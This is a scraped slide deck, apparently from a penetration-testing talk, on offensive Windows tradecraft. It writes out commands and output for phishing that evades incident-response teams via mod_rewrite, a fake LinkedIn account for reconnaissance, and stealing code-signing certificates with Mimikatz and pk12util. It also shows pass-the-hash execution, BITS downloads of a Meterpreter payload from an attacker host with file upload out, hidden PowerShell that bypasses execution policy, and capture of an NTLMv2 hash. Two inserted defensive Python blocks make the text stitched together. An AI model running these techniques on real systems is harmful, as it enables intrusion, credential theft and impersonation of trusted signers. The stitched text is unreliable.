• Putting in the hours on LinkedIn for SE
• Giving IR teams a run for their money
• Stealing certs
• Mimikatz with Metasploit
• New Incognito && Netview release
• Ditto
• 10 ways to PSEXEC
• Why doesn’t SYSTEM have proxy settings!?!
• Windows is my backdoor (bitsadmin, powershell, wmi)
• WebDAV server via metasploit
• Turning your External Pentest into an Internal one
• Overview of current DNS Payload options (if time)

6. The setup…
We like to use LinkedIn for OSINT but how can we do it better?

7. Becoming a LiON
• Why?
  • API is based on YOUR connections
  • 2nd and 3rd level connections count but are given different access
• Creating a fake account
• Connecting with Recruiters ++
• Connecting with “Open Networkers”

8. LinkedIn API
• URL: https://developer.linkedin.com
• Allows you to query information
  – Company info
  – Groups
  – Name about your 1st & 2nd order connections
9. Big Ass LinkedIn Network
• Meet “John”
• John has been busy being awesome on LinkedIn for the last few months

11. LinkedIn API
• Limited by YOUR connections and network reach
• API gives you NO info about 3rd order connections
• Usually you’ll see more info via the web on 3rd order people
• The total number of search results possible for any search will vary depending on the user's account level.

12. LinkedIn API
• An example (Palantir) CG vs. John

13. LinkedIn API
• An example (Pfizer) CG vs. John

14. LinkedIn API
• An example (Bank of America) CG vs. John

15. More LinkedIn
• Turning an email list into validated LinkedIn Contacts/emails
• Import them!

16. More LinkedIn
• Get some emails

17. More LinkedIn
• Import them!
• Need them in a specific format though.
  – Ruby to the rescue

19. More LinkedIn
• Get some contacts

20. More LinkedIn
• Import and do your thing
  • 21. The setup… IR teams F**k up all my hard work preparing phishing attacks
  • 22. Phishing and F**king with IR Teams • Thanks to people like SANS organizations have a standardized, repeatable, process  – What’s not to like? – Submit to the sandbox – Submit to the malware lookup site – I feel safe! • But, sure does suck when you spend all that time setting up a phish only to have it ruined by this well tuned, standardized process…
  • 23. Phishing and F**king with IR Teams • What you *could* do… – Build a phish that EVERYONE will report – Capture the IR process via log/scan/analyst activity • This gives you intel on: – Which services are contracted out for analysis • And their IPs – Are humans in the mix • And their IPs – Level of sophistication
  • 24. Phishing and F**king with IR Teams • Once you know who’s coming to do analysis, we can send them to an alternate site and keep the users going to the phish site. • How?
  • 25. Phishing and F**king with IR Teams • Apache and mod_rewrite is an option:
    RewriteEngine On
    RewriteCond %{HTTP_USER_AGENT} ^$ [OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*(<|>|'|%0A|%0D|%27|%3C|%3E|%00).* [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*(HTTrack|clshttp|archiver|loader|email|nikto|miner|python|wget|Wget).* [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*(winhttp|libwww-perl|curl|libcurl|harvest|scan|grab|extract).* [NC,OR]
    # outside IR
    RewriteCond %{REMOTE_ADDR} ^188.168.16.164$ [OR]
    # googlebot
    RewriteCond %{REMOTE_ADDR} ^66.249.73.136$ [OR]
    RewriteCond %{REMOTE_ADDR} ^88.88.
    RewriteRule ^(/.*) http://www.totallysafesite.com/$1 [R,L]
  • 26. The setup… I want to find and steal code signing certificates from victims
  • 27. Stealing Certificates • Why? • Have you tried to get/buy one? It’s a pain in the ass. – I see why people just steal them • Impact – Sign code as the company – Now your code may be *more* trusted by the victim…or at least less suspicious – Can you steal their wildcard SSL cert?
  • 28. Stealing Certificates • If you export one, it has to have a password • However, if YOU export it, YOU can set the password. • You can do this all on the command line – Use Mozilla’s certutil • http://www.mozilla.org/projects/security/pki/nss/tools/certutil.html – Use Mimikatz
  • 29. Stealing Certificates • Mozilla certutil • Compile your own, or download precompiled bins
    certutil.exe -L -d C:\Users\CG\AppData\Roaming\Mozilla\Firefox\Profiles\6smdhwru.default-1339854577637
    VeriSign Class 3 Extended Validation SSL CA           ,,
    DigiCert High Assurance CA-3                          ,,
    VeriSign Class 3 International Server CA - G3         ,,
    COMODO Extended Validation Secure Server CA 2         ,,
    Verified Publisher LLC's COMODO CA Limited ID         u,u,u   <------- code signer
    Akamai Subordinate CA 3                               ,,
    VeriSign, Inc.                                        ,,
    --snip--
  • 30. Stealing Certificates • Mozilla certutil • -L List all the certificates, or display information about a named certificate, in a certificate database.
    certutil.exe -L -d C:\Users\CG\AppData\Roaming\Mozilla\Firefox\Profiles\6smdhwru.default-1339854577637
    VeriSign Class 3 Extended Validation SSL CA           ,,
    DigiCert High Assurance CA-3                          ,,
    VeriSign Class 3 International Server CA - G3         ,,
    COMODO Extended Validation Secure Server CA 2         ,,
    Verified Publisher LLC's COMODO CA Limited ID         u,u,u
    Akamai Subordinate CA 3                               ,,
    VeriSign, Inc.                                        ,,
    --snip--
    • “u”: Certificate can be used for authentication or signing • http://www.mozilla.org/projects/security/pki/nss/tools/certutil.html
  • 31. Stealing Certificates • Mozilla pk12util.exe • To extract the cert:
    C:\Users\CG\Downloads\nss-3.10\nss-3.10\bin>pk12util.exe -n "Verified Publisher LLC's COMODO CA Limited ID" -d C:\Users\CG\AppData\Roaming\Mozilla\Firefox\Profiles\6smdhwru.default-1339854577637 -o test2.p12 -W mypassword1
    • http://www.mozilla.org/projects/security/pki/nss/tools/pk12util.html
  • 32. Stealing Certificates Via Mimikatz (list certs)
    execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My" exit'
    Process 3472 created.
    Channel 12 created.
    mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */ // http://blog.gentilkiwi.com/mimikatz
    mimikatz(commandline) # crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My
    Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'\My
     - sqlapps01
        Container Clé : SELFSSL
        Provider      : Microsoft RSA SChannel Cryptographic Provider
        Type          : AT_KEYEXCHANGE
        Exportabilité : OUI
        Taille clé    : 1024
    mimikatz(commandline) # exit
  • 33. Stealing Certificates Via Mimikatz (export certs)
    execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" exit'
    Process 6112 created.
    Channel 23 created.
    mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */ // http://blog.gentilkiwi.com/mimikatz
    mimikatz(commandline) # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE
    Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'\My
     - sqlapps01
        Container Clé : SELFSSL
        Provider      : Microsoft RSA SChannel Cryptographic Provider
        Type          : AT_KEYEXCHANGE
        Exportabilité : OUI
        Taille clé    : 1024
        Export privé dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_sqlapps01.pfx' : OK
        Export public dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_sqlapps01.der' : OK
    mimikatz(commandline) # exit
  • 34. The setup… Mimikatz is awesome and I want to execute it without putting bins on the box
  • 35. Mimikatz gives me clear text passwords?
  • 37. Mimikatz • Mimikatz detected by AV • Sekurlsa.dll detected by AV • WCE detected by AV • WCE IN MEMORY! (kinda) Stop submitting $#!+ to Virus Total!
  • 38. Mimikatz • New version (6 Sep 12) supports in-memory • execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'
  • 41. The setup… Incognito is awesome and I want to show/leverage the new features
  • 42. New Incognito (find_token)
    C:\>find_token.exe
    usage: find_token.exe <server_name_or_ip> | -f <server_list_file> [username] [password]
  • 43. New Incognito (find_token)
    C:\>find_token.exe dc1
    [*] Scanning for logged on users...
    Server Name   Username
    ------------------------------------------------------
    dc1           PROJECTMENTOR\jdoe
    dc1           PROJECTMENTOR\jdoe
  • 45. Release of NETVIEW
    C:\Documents and Settings\user\Desktop>netview
    Netviewer Help
    --------------------------------------------------------------------
    -d domain       : Specifies a domain to pull a list of hosts from
                      uses current domain if none specified
    -f filename.txt : Speficies a file to pull a list of hosts from
    -o filename.txt : Out to file instead of STDOUT
  • 46. Release of NETVIEW
    C:\Documents and Settings\user\Desktop>netview -d
    [*] -d used without domain specifed - using current domain
    [+] Number of hosts: 3
    [+] Host: WIN7X64
    Enumerating AD Info
    [+] WIN7X64 - Comment -
    [+] WIN7X64 - OS Version - 6.1
    Enumerating IP Info
    [+] WIN7X64 - IPv4 Address - 172.16.10.216
    Enumerating Share Info
    [+] WIN7X64 - Share - ADMIN$ Remote Admin
    [+] WIN7X64 - Share - C$ Default share
    [+] WIN7X64 - Share - IPC$ Remote IPC
    Enumerating Session Info
    [+] WIN7X64 - Session - USER from 172.16.10.206 - Active: 0 - Idle: 0
    Enumerating Logged-on Users
    [+] Host: DC1
    Enumerating AD Info
    [+] DC1 - Comment -
    [+] DC1 - OS Version - 6.1
    [+] DC1 - Domain Controller
    Enumerating IP Info
    [+] DC1 - IPv4 Address - 172.16.10.10
    Enumerating Share Info
    [+] DC1 - Share - ADMIN$ Remote Admin
    [+] DC1 - Share - C$ Default share
    [+] DC1 - Share - IPC$ Remote IPC
    [+] DC1 - Share - NETLOGON Logon server share
    [+] DC1 - Share - SYSVOL Logon server share
    Enumerating Session Info
    [+] DC1 - Session - USER from 172.16.10.206 - Active: 0 - Idle: 0
    Enumerating Logged-on Users
    [+] DC1 - Logged-on - PROJECTMENTOR\jdoe
    [+] DC1 - Logged-on - PROJECTMENTOR\jdoe
  • 47. Release of NETVIEW AND IT’S ALREADY ON GITHUB:
  • 48. The setup… Dropping binaries is a necessity sometimes, persistence for instance, but unless you name your bin SVCHOST.exe you don’t want it looking like:
  • 49. this:
  • 51. He does something really well…
  • 52. And it’s not just the icon…
  • 53. Yes, it’s already on Github too
  • 54. The setup… Who doesn’t want more ways to psexec??!!!
  • 55. 10 ways to PSEXEC
  • 56. Sysinternals PSEXEC
    POSITIVES
    • Never going to be on any AV list
    • Executes binary as user specified, not as SYSTEM, so no Proxy concerns
    NEGATIVES
    • Need a Password
    • Leaves PSEXESVC running
    • Have to touch disk if not present already
  • 57. Metasploit PSEXEC
    POSITIVES
    • Supports the use of Hashes
    NEGATIVES
    • Some AVs flag service binary due to injection techniques used within
    • Rundll32.exe is running
  • 58. Metasploit PSEXEC-MOF
    POSITIVES
    • Drop a file and Windows automatically runs it. (MAGIC!)
    NEGATIVES
    • XP and below – (only because Metasploit doesn’t automatically compile MOFs)
    • ADMIN$ required – (Unless you make code edits)
  • 59. Metasploit PSEXEC-As-User
    POSITIVES
    • Executes as the current user
    • No need for passwords or hashes
    • Also a great way to bypass UAC.. But more on that later
    NEGATIVES
    • Some AVs flag service binary due to injection techniques used within
    • Rundll32.exe is running
  • 60. WMI
    POSITIVES
    • Never going to be on any AV list
    • Executes binary as user specified, not as SYSTEM, so no Proxy concerns
    NEGATIVES
    • Need a Password
  • 61. Powershell
    POSITIVES
    • Never going to be on any AV list
    • Executes binary as user specified, not as SYSTEM, so no Proxy concerns
    NEGATIVES
    • Need a Password
  • 62. RemCom
    POSITIVES
    • Open source psexec
    • You can add Pass-The-Hash – (open source an all)
    • Runs as SYSTEM
    NEGATIVES
    • Binary, so again, can’t go over Metasploit sessions directly – portfwd Fu can still be used on a single IP
  • 63. Winexe
    POSITIVES
    • Open source psexec
    • Supports Pass-The-Hash
    • Runs as SYSTEM
    NEGATIVES
    • Binary, so again, can’t go over Metasploit sessions directly – portfwd Fu can still be used on a single IP
  • 64. smbexec
    POSITIVES
    • Open source psexec
    • Supports Pass-The-Hash
    NEGATIVES
    • Binary – (but designed with shoveling over Metasploit in mind)
    http://sourceforge.net/projects/smbexec/
  • 65. Pass the hash for 15 years stuff here • Firefox • smbclient • smbmount • Rpcclient • http://passing-the-hash.blogspot.com/
  • 66. Zfasel’s stuff here • If it ever gets released works ;-) LOVE YOU FASEL!! Go see his talk, it works now… maybe…
  • 67. Python && impacket • http://code.google.com/p/impacket/ • PTH support for SMB/MSSQL/
  • 68. WinRM (‘new’ hotness)
    POSITIVES
    • Never going to be on any AV list
    • Executes binary as user specified, not as SYSTEM, so no Proxy concerns
    NEGATIVES
    • Need a Password
  • 69. Do you look for 5985 internally on your pen tests? we would suggest it ;-) src: http://3.bp.blogspot.com/_nldKmk1qZaA/S2ahpNBS1BI/AAAAAAAAAy8/XrOxvP8B93M/s1600/winrm6.png
  • 70. Victim:
    winrm quickconfig -q
    Attacker:
    winrm quickconfig -q
    winrm set winrm/config/client @{AllowUnencrypted="true";TrustedHosts="192.168.1.101"}
    Yes.. That’s right, THE ATTACKER says which hosts to trust… Sooooo much fun to be had! Oh, and did I mention it’s completely interactive? (You can enter password questions)
  • 71. Metasploit PSEXEC-WinRM
    POSITIVES
    • Never going to be on any AV list
    • Executes binary as user specified, not as SYSTEM, so no Proxy concerns
    NEGATIVES
    • Need a Password
    DISCLAIMER: CURRENTLY VAPORWARE!! but…
  • 72. Build your own pyBear • PySMB supports auth using hashes • Thanks Rel1k for the heads up on the library – but I’m not a good enough coder to get it working • Compile your own psexec with hash support • ;-) • Impacket (again)
  • 73. Build your own Bear.rb • Metasploit’s Rex library – already has the hash passing goodness – HDM committed a stand-alone version of PSEXEC on September 5th 2012
  • 74. The setup… UAC sucks… bypassing only takes 2 things…
  • 75. The setup… If you’re an admin and UAC is stopping you…
  • 76. Find a network with more than one Windows box…
  • 77. The setup… Why doesn’t SYSTEM have proxy settings !?!
  • 78. • If OS !> Vista – SMB/UPLOAD_FILE BITSADMIN 2.0 (32bit)
    • WINDOWS/EXEC (or any of the other psexec methods we just talked about)
      – BITSADMIN /UTIL /SETIEPROXY LOCALSYSTEM AUTOSCRIPT http://wpad/wpad.dat ";" (or PAC)
      – BITSADMIN /UTIL /SETIEPROXY LOCALSYSTEM MANUAL_PROXY 192.168.5.100:3128 ";"
      – After you’re done, use NO_PROXY in place of AUTOSCRIPT or MANUAL_PROXY
    • Then MSF-PSEXEC to your heart’s content, SYSTEM will now use the proxy you’ve set.
  • 79. NETSH & ProxyCFG • Sets the WinHTTP proxy – Not Windows’ proxy settings, only used if the program uses WinHTTP
    • XP – proxycfg -p 192.168.92.100:3128 – or – proxycfg -u (pulls it from IE)
    • Vista+ – netsh winhttp set proxy 192.168.92.100:3128 – or – netsh winhttp import proxy ie
  • 80. REGISTRY Poking • HKLM\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings • ProxySettingsPerUser [DWORD] • Set to 0: settings are system-wide • Set to 1: settings are per user
  • 81. The setup… Neat binaries that do backdoor/RAT behavior that are already there for us.
  • 82. Windows is my backdoor BITS “BITS is a file transfer service that provides a scriptable interface through Windows PowerShell. BITS transfers files asynchronously in the foreground or in the background. And, it automatically resumes file transfers after network disconnections and after a computer is restarted.” http://technet.microsoft.com/en-us/library/dd819415.aspx
  • 83. Windows is my backdoor BITS There are three types of BITS transfer jobs: - A download job downloads files to the client computer. - An upload job uploads a file to the server. - An upload-reply job uploads a file to the server and receives a reply file from the server application.
  • 84. Windows is my backdoor BITS (How-To) • Set the server side up (HTTP, not standard setup) – Google • Uses PowerShell to upload/download
    Import BITS
    PS C:\Users\cg> Import-Module BitsTransfer
    Download files over BITS
    PS C:\Users\cg> Start-BitsTransfer http://192.168.26.128/upload/meterp443.exe C:\Users\cg\Desktop\meterpdownload443.exe
  • 85. Windows is my backdoor BITS (How-To)
    Upload files over BITS
    PS C:\Users\cg> Start-BitsTransfer -Source C:\Users\cg\Desktop\file2upload.txt -Destination http://192.168.26.128/upload/myfile.txt -TransferType Upload
  • 86. Windows is my backdoor BITS over Wireshark
  • 87. Windows is my backdoor • Powershell • OMG Powershell!
  • 88. Windows is my backdoor • Powershell
  • 89. Windows is my backdoor • PowerShell – Does A LOT! – Check out Exploit Monday and PowerSploit – Carlos Perez has had lots of PowerShell blog posts – I haven't found a meterpreter feature that cant be done with PowerShell
  • 90. Windows is my backdoor • Powershell cool examples – Powershell hashdump (in SET) – Poweshell exec method in MSSQL_Payload – PowerSploit (syringe dll inject/shellcode exec ala PowerShell)
  • 91. Windows is my backdoor • Powershell cool examples • Port Scanner:
    PS C:\> 1..1024 | % { echo ((new-object Net.Sockets.TcpClient).Connect("10.1.1.14",$_)) "$_ is open" } 2>$null
    25 is open
    • From Tim Medin https://blogs.sans.org/pen-testing/files/2012/04/PowerShellForPT-export.pdf
  • 92. Windows is my backdoor • Powershell cool examples • Port Sweeper
    PS C:\> 1..255 | % { echo ((new-object Net.Sockets.TcpClient).Connect("10.1.1.$_",445)) "10.1.1.$_" } 2>$null
    10.1.1.5
    • From Tim Medin https://blogs.sans.org/pen-testing/files/2012/04/PowerShellForPT-export.pdf
  • 93. Windows is my backdoor • Powershell cool examples • Bypass execution policy – Dave Kennedy talked about this at defcon 18 – Requires PowerShell v2.0 or above
    powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File "C:\do_neat_ps_shit.ps1"
  • 94. Windows is my backdoor • CreateCMD stuff from Dave Kennedy • In SET • Pshexec by Carlos Perez • https://github.com/darkoperator/Meterpreter-Scripts/blob/master/scripts/meterpreter/pshexec.rb • B64 encodes the command so you can pass via meterp or in another script
    powershell -noexit -EncodedCommand [b64enc BLOB]
  • 95. Windows is my backdoor • Metasploit to generate PowerShell • Uses old powersploit technique
  • 96. Windows is my backdoor • How to run PowerShell from Meterpreter – Use a bat file
    C:\>type run_ps.bat
    powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File C:\ipinfo2.ps1
    Example:
    meterpreter > execute -H -f cmd.exe -a '/c C:\runps.bat'
    Process 28536 created.
    meterpreter > [*] 4.5.6.21:3863 Request received for /vLNL...
    [*] 4.5.6.21:3863 Staging connection for target /vLNL received...
    --snip--
    [*] Patched Communication Timeout at offset 653608...
    [*] Meterpreter session 9 opened (1.2.3.205:443 -> 4.5.6.21:3863) at 2012-09-09 16:29:30 -0400
  • 97. The setup… A webdav server to download files from. Why? Because we can.
  • 99. MSF WebDAV server
    • net use \\ip\documents /User:Guest
    • copy \\ip\documents\myexe.exe myexe.exe
    • Available on github: https://github.com/carnal0wnage/Metasploit-Code/blob/master/modules/exploits/webdav_file_server.rb
  • 100. MSF WebDAV server
    msf exploit(webdav_file_server) >
    [*] 192.168.26.1:17870 OPTIONS /documents/myexe.exe
    [*] 192.168.26.1:17870 PROPFIND /documents/myexe.exe
    [*] 192.168.26.1:17870 PROPFIND => 207 File (/documents/myexe.exe)
    [*] 192.168.26.1:17870 PROPFIND /documents/myexe.exe
    [*] 192.168.26.1:17870 PROPFIND => 207 File (/documents/myexe.exe)
    [*] 192.168.26.1:17870 PROPFIND /documents
    [*] 192.168.26.1:17870 PROPFIND => 301 (/documents)
    [*] 192.168.26.1:17870 PROPFIND /documents/
    [*] 192.168.26.1:17870 PROPFIND => 207 Directory (/documents/)
    [*] 192.168.26.1:17870 PROPFIND => 207 Top-Level Directory
    [*] 192.168.26.1:17870 GET => Delivering Local EXE Payload [ /tmp/myexe.exe ]
  • 101. The Setup… LAN based attacks are instant wins on internal pentests, but difficult if not impossible to do on externals… or are they…
  • 102. While we are on the subject… Does anyone know what happens when you try to access a share on a Windows box that doesn’t exist from another Windows box?? [diagram: “I want to access SHARE3” → “I don’t have SHARE3” → “Is that it?”]
  • 103. nope (if the WebClient service is started – Vista+ manual start) [diagram: “I want to access SHARE3” → “I don’t have SHARE3” on SMB → “I want to access SHARE3 over WebDAV”] If you are following along at home, Windows is always (unless disabled) listening on port 445 (SMB) so an attacker can’t override it, but rarely has anything listening on port 80
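The SMB-to-WebDAV fallback described above leaves a signature a defender can hunt for: the Windows WebClient retries the UNC path over HTTP with OPTIONS/PROPFIND requests and the User-Agent "Microsoft-WebDAV-MiniRedir/<os version>", and a 401 in reply is the listener asking it to authenticate. The detection below is an added example, not code from the talk; it runs over constructed, simplified http.log-style lines and assumes a list of sanctioned internal WebDAV hosts.

```python
from collections import defaultdict

# Simplified Zeek-http.log-style lines constructed for this example (not real traffic).
# Fields: ts  orig_h  resp_h  resp_p  method  uri  status  user_agent
SAMPLE_HTTP_LOG = """\
1348201340.1  172.16.10.216  172.16.10.50  80  OPTIONS   /share3           401  Microsoft-WebDAV-MiniRedir/6.1.7601
1348201341.2  172.16.10.216  172.16.10.50  80  PROPFIND  /share3           401  Microsoft-WebDAV-MiniRedir/6.1.7601
1348201345.0  172.16.10.216  172.16.10.50  80  PROPFIND  /share3/test.png  207  Microsoft-WebDAV-MiniRedir/6.1.7601
1348201360.0  172.16.10.206  172.16.10.20  80  PROPFIND  /sites/team       207  Microsoft-WebDAV-MiniRedir/6.1.7601
1348201370.0  172.16.10.206  172.16.10.50  80  GET       /index.html       200  Mozilla/5.0 (Windows NT 6.1)
"""

# Hypothetical allowlist: 172.16.10.20 stands in for a sanctioned intranet WebDAV server.
SANCTIONED_WEBDAV_HOSTS = {"172.16.10.20"}

WEBDAV_METHODS = {"OPTIONS", "PROPFIND"}
MINIREDIR_UA = "Microsoft-WebDAV-MiniRedir/"


def parse_line(line):
    """Split one log line into a dict; the user agent may contain spaces, so split at most 7 times."""
    fields = line.split(None, 7)
    if len(fields) < 8:
        return None
    ts, orig_h, resp_h, resp_p, method, uri, status, ua = fields
    return {"ts": float(ts), "src": orig_h, "dst": resp_h, "port": int(resp_p),
            "method": method, "uri": uri, "status": int(status), "ua": ua.strip()}


def find_webdav_fallback(log_text, sanctioned_hosts):
    """Return one finding per (src, dst) pair where the Windows Mini-Redirector probed a host
    that is not a sanctioned WebDAV server. 'challenged' counts 401 replies, i.e. how many
    times the listener asked the client to authenticate."""
    hits = defaultdict(lambda: {"requests": 0, "challenged": 0, "uris": []})
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None or rec["method"] not in WEBDAV_METHODS:
            continue
        if not rec["ua"].startswith(MINIREDIR_UA) or rec["dst"] in sanctioned_hosts:
            continue
        h = hits[(rec["src"], rec["dst"])]
        h["requests"] += 1
        h["challenged"] += int(rec["status"] == 401)
        if rec["uri"] not in h["uris"]:
            h["uris"].append(rec["uri"])
    return [{"src": s, "dst": d, **v} for (s, d), v in sorted(hits.items())]


if __name__ == "__main__":
    for f in find_webdav_fallback(SAMPLE_HTTP_LOG, SANCTIONED_WEBDAV_HOSTS):
        print(f"{f['src']} -> {f['dst']}: {f['requests']} WebDAV probes, "
              f"{f['challenged']} auth challenges, paths {f['uris']}")
```

A hit where the destination also has no legitimate web service is worth a closer look: per the slides the listener on port 80 is what gets to issue the NTLM challenge.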
  • 104. On-target NBNS Spoofing FakeNetbiosNS FTW!
  • 105. Meet the Microsoft Windows Firewall “PORTPROXY” feature Basically it’s port-forwarding but can do so for: IPv4 -> IPv4 IPv6 -> IPv4 IPv6 -> IPv6 IPv4 -> IPv6 In XP, if you set up a PORTPROXY, it doesn’t show up in “NETSTAT” or TCPview ;-)
  • 106. Now convince/cause someone to connect to a fake share on VICTIM1…
  • 107. weeeeeeeeeeeeee
    [*] 50.50.50.50 http_ntlm - Request '/share3/test.png'...
    [*] 50.50.50.50 http_ntlm - 2012-01-10 04:22:25 +0000
    NTLMv2 Response Captured from WIN7X86
    DOMAIN: PROJECTMENTOR USER: jadmin
    LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled
    NTHASH:9eed2162b1c7424780204fb9ced5bc1a NT_CLIENT_CHALLENGE:0101000000000000067a01b4b097cd01c77c09ccedbfc55d0000000002001a00700072006f006a006500630074006d0065006e0074006f0072000000000000000000
  • 108. why [diagram]
    1. Give me SHARE3!
    2. Portproxy!
    3. AUTH!
    4. AUTH! via portproxy
    5. OK, you are in my Intranet, AUTOAUTH
    6. AUTOAUTH!
    7. kthxbai!
    And yes, SMB_Relay works just fine if you have a route set up over your meterpreter shell of the connect back. Oh, did I mention cross-protocol means you can go to the same host?! ;-)
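The NT_CLIENT_CHALLENGE blob in the capture above is an NTLMv2_CLIENT_CHALLENGE structure (MS-NLMP 2.2.2.7); decoding it tells an analyst when the client signed the response and what target info it bound to, and whether the client supplied the channel-binding and target-name AV pairs that make the exchange resistant to relay. The parser below is an added example, not code from the talk; it uses the hex bytes exactly as printed on the slide.

```python
import struct
from datetime import datetime, timedelta, timezone

# AV_PAIR ids from MS-NLMP 2.2.2.1 ("target info" carried in the client challenge).
AV_IDS = {
    0: "MsvAvEOL", 1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName",
    3: "MsvAvDnsComputerName", 4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName",
    6: "MsvAvFlags", 7: "MsvAvTimestamp", 8: "MsvAvSingleHost",
    9: "MsvAvTargetName", 10: "MsvAvChannelBindings",
}
UTF16_IDS = {1, 2, 3, 4, 5, 9}

# NT_CLIENT_CHALLENGE hex copied from the slide above (line breaks removed).
SLIDE_BLOB = bytes.fromhex(
    "0101000000000000067a01b4b097cd01c77c09ccedbfc55d0000000002001a0070007"
    "2006f006a006500630074006d0065006e0074006f0072000000000000000000"
)


def filetime_to_datetime(ft):
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) -> timezone-aware datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)


def parse_ntlmv2_client_challenge(blob):
    """Decode an NTLMv2_CLIENT_CHALLENGE as printed by capture modules. The layout is
    RespType(1) HiRespType(1) Reserved1(2) Reserved2(4) TimeStamp(8) ClientChallenge(8)
    Reserved3(4) then AV_PAIRs until MsvAvEOL. Truncated blobs are reported, not rejected."""
    if len(blob) < 28 or blob[0] != 0x01 or blob[1] != 0x01:
        raise ValueError("not an NTLMv2 client challenge (RespType/HiRespType must be 0x01)")
    timestamp, client_challenge = struct.unpack_from("<Q8s", blob, 8)
    info = {"timestamp": filetime_to_datetime(timestamp),
            "client_challenge": client_challenge.hex(), "av_pairs": {}, "truncated": False}
    pos = 28
    while True:
        if pos + 4 > len(blob):
            info["truncated"] = True
            break
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        pos += 4
        if av_id == 0:                      # MsvAvEOL terminates the list
            break
        value = blob[pos:pos + av_len]
        pos += av_len
        if len(value) < av_len:
            info["truncated"] = True
        name = AV_IDS.get(av_id, f"unknown_{av_id}")
        if av_id in UTF16_IDS:
            info["av_pairs"][name] = value.decode("utf-16-le", errors="replace")
        elif av_id == 7 and len(value) == 8:
            info["av_pairs"][name] = filetime_to_datetime(struct.unpack("<Q", value)[0])
        else:
            info["av_pairs"][name] = value.hex()
        if info["truncated"]:
            break
    # Both pairs present means the client bound the response to a TLS channel and an SPN
    # (Extended Protection); their absence is what makes a captured response relayable.
    info["epa_bound"] = {"MsvAvChannelBindings", "MsvAvTargetName"} <= info["av_pairs"].keys()
    return info


if __name__ == "__main__":
    for k, v in parse_ntlmv2_client_challenge(SLIDE_BLOB).items():
        print(f"{k}: {v}")
```

The slide's blob carries only the NetBIOS domain name, so the decoder reports no channel binding or target name, which is consistent with the relay scenario the slide describes.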
  • 109. Respectfully refrained from any Inside->Out Google images. You’re welcome.
  • 110. The setup… Are DNS Payloads useful? Let’s talk about our public options
  • 111. DNS Payloads • Quick talk on currently available DNS payloads • What’s available? – CANVAS DNS Mosdef – DNS Cat (skull security) – Metasploit DNS Payloads
  • 112. DNS Payloads • Canvas DNS Mosdef – Uses DNS TXT Records • So it’s UDP and correctly formed? – BUT • Directly connects to the host • Uses TXT records, – I’ve never pentested someone *good* that allowed this
  • 113. DNS Payloads • Canvas DNS Mosdef
  • 114. DNS Payloads • DNSCat (Skullsecurity) – http://www.skullsecurity.org/wiki/index.php/Dnscat – Uses recursive DNS requests • So it’s UDP and correctly formed? – Has a metasploit payload, so can make a msf dnscat binary to run and get shell – Same as dnscat -d domain -exec "cmd.exe" – BUT • But does recursive DNS requests • Never worked for me IRL
  • 115. DNS Payloads • DNSCat (Skullsecurity)
  • 116. DNS Payloads • DNSCat (java version) – http://tadek.pietraszek.org/projects/DNScat/ – Comes as java libs – Requires PPP to tunnel anything useful • *nix only?
  • 117. DNS Payloads • DNSCat (java version)
  • 118. DNS Payloads • Metasploit DNS – Currently there are no full DNS payloads • Aside from skullsecurity dnscat payload (not in trunk) – There are several payloads that will go fetch ANOTHER payload and exec it for you via DNS • dns_txt_query_exec.rb • dns_query_exec.rb • https://github.com/rapid7/metasploit-framework/pull/173 – Something in the works: http://dev.metasploit.com/redmine/issues/444#note-9
  • 119. DNS Payloads • Bottom Line – Nothing public that’s usable ATM

Editor's Notes

  1. Just talk the past work piece
  2. LinkedIn Open Networkers
  3. Pfizer
  4. Pfizer
  5. Maybe I don’t automate enough?
  6. You can play space invaders on it, how much else do you need!?
  7. And by a lot, I mean a lot …holy shit
  8. You can play space invaders on it, how much else do you need!?